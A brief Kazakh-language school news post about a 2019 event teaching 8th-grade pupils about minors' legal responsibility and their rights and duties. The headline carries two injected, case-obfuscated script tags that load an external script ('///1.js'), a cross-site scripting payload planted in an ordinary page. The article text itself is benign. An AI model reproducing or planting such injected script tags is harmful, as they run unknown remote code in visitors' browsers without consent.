«Заңды білмеу жауапкершіліктен босатпайды»<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
26.03.2019
8 сынып оқушылары арасында өз іс-әрекеттеріне жауапкершілік сезімін тәрбиелеу мақсатында «Кәмелетке толмағандардың заң алдындағы жауапкершілігі» атты іс-шара өтті. Іс-шара барысында балалар № 5 мектептің жарғысында бекітілген құқықтары мен міндеттерін еске түсіріп, мектеп өмірінің ережелерін талқылады, адамның және азаматтың парасаттылығы мәселелеріне байланысты тест тапсырмаларын орындап, оларды өздері бағалады. Сондай-ақ, құқықтық міндеттерді шешіп, ҚР Конституциясына сәйкес адам құқығын білуін көрсетті. Ойын түрінде адам құқықтарының бұзылуымен байланысты жағдайларды талдады.
Барлық оқушылар қоғамдық құндылықтарға деген көзқарасын және Заңға деген құрметін көрсетті.
8 «Б» сынып жетекшісі Аманбаева Р. Т.
Просмотров: 1345